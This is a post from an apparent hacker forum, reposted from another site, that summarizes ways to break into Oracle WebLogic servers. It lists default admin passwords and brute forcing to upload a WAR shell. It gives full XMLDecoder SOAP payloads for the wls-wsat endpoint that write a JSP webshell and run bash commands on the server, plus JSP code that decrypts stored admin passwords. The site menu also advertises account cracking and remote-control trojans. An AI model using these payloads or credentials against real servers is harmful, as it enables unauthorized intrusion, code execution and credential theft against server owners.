[ HOME ]  [ 隱私政策 ]  [ 0day ]  [ 業務合作 ]  [ 獲取金幣 ]  [ ins破解 ]  [ Facebook破解 ]  [ faq ]  [ 联系我们 ]  [ 遠程控制木馬 ]  [ 合作方式 ]    用戶: 40393     
Telegram联系我们

標題:針對Weblogic測試的一些小總結(轉)

T

taibeihacker

Moderator

1. 管理员登录页面弱密码​

Weblogic的端口一般為7001,弱密碼一般為weblogic/Oracle@123orweblogic,或者根據具體情況進行猜測,公司名,人名等等,再有就可以用burpsuiteintruder進行暴力破解,一旦成功就可以上傳war包getshell.
q4z1p3rs4bq23891.png

2. weblogic ssrf​

Oracle WebLogic web server即可以被外部主機訪問,同時也允許訪問內部主機。如果存在此url
et1kcbnjvfx23892.png

rhjvhwaefsh23894.png

3. weblogic反序列化​

Wenlogic反序列化的漏洞已經被爆出很長時間,網上可以找出各種各樣的工具,在這裡我就不再多提了。
ichuvhy3ear23895.png

hryap12s1fv23897.png

4. weblogic_uac​

第一步抓取http://x.x.x.x:7001/wls-wsat/CoordinatorPortType對其發起POST請求(任意包都可以,只要url對就可以)
oeo0l1y4x3i23899.png

第二步加入Content-Type:text/xml第三步在body中放入payload
soapenv:Envelope xmlns:soapenv='http://schemas.xmlsoap.org/soap/envelope/'
soapenv:Header
work:WorkContext xmlns:work='http://bea.com/2004/06/soap/workarea/'
javajava version='1.4.0' class='java.beans.XMLDecoder'
object class='java.io.PrintWriter'
stringservers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/a.jsp/stringvoid method='println'
string![CDATA[`此處放馬(因為馬的代碼量太長顧不在此處展示ps:此處上傳的不要帶有中文要不會報錯,可刪掉中文上傳,也可進行編碼處理)`
]]/string/voidvoid method='close'/
/object
/java
/java
/work:WorkContext
/soapenv:Header
soapenv:Body/
/soapenv:Envelope
ok4mzxiitoy23900.png

ruwfv3xsgba23902.png

以上為默認路徑,如果不是默認路徑同時又是linux系統可用以下payload爆出路徑
soapenv:Envelope xmlns:soapenv='http://schemas.xmlsoap.org/soap/envelope/'
soapenv:Header
work:WorkContext xmlns:work='http://bea.com/2004/06/soap/workarea/'
java version='1.8.0_131' class='java.beans.xmlDecoder'
void class='java.lang.ProcessBuilder'
array class='java.lang.String' length='3'
void index='0'
string/bin/bash/string
/void
void index='1'
string-c/string
/void
void index='2'
stringfind $DOMAIN_HOME -type d -name bea_wls_internal|while read f;do find $f -type d -name war;done|while read ff;do echo $ff $ff/a.txt;done/string
/void
/array
void method='start'//void
/java
/work:WorkContext
/soapenv:Header
soapenv:Body/
/soapenv:Envelope

5. weblogic 在线与离线解密​

如有webshell可進行在線解密
把以下代碼放入服務器進行訪問,s=''中填寫weblogic的加密密碼,可在boot.properties文件中找到。默認路徑為./././Server/security/boot.properties
ecujjfr0o4523904.png

%@page pageEncoding='utf-8'%
%@page import='weblogic.security.internal.*,weblogic.security.internal.encryption.*'%
%
EncryptionService es=null;
ClearOrEncryptedService ces=null;
String s=null;
s='{AES}wfFNcH6k+9Nz22r1gCMnylgUr9Ho5kz8nDgib/TuOZU=';
es=SerializedSystemIni.getEncryptionService();
if (es==null) {
out.println('Unable to initialize encryption service');
return;
}
ces=new ClearOrEncryptedService(es);
if (s !=null) {
out.println('\nDecrypted Password is:' + ces.decrypt(s));
}
%
離線解密需要兩個文件SerializedSystemIni.dat和boot.properties
a3vmpjixlzc23906.png

來源:https://xz.aliyun.com/t/2149
 
你必須登入或註冊才能在此回覆。

Partner Website 友情鏈接 : 黑客漏洞仓库 臺灣駭客團隊論壇 全球最大的中文黑客论坛 한국 해커 팀 포럼 The dark Web hacking team 骇客团队 HACKER.BZ UKhacker
臺灣黑客團隊論壇:聲明,本網站的教程、文章、工具和其他相關內容僅供學習和研究使用,旨在提高公眾的網絡安全意識和防護能力。
我們強烈反對任何形式的非法活動,禁止未經授權的入侵、攻擊、破壞他人的網絡系統等行為。
Copyright © 2013-2025 Hackerninja 您可以聯系我們的Telegram進行業務合作: @APTs37  网站地图Sitemap
返回
上方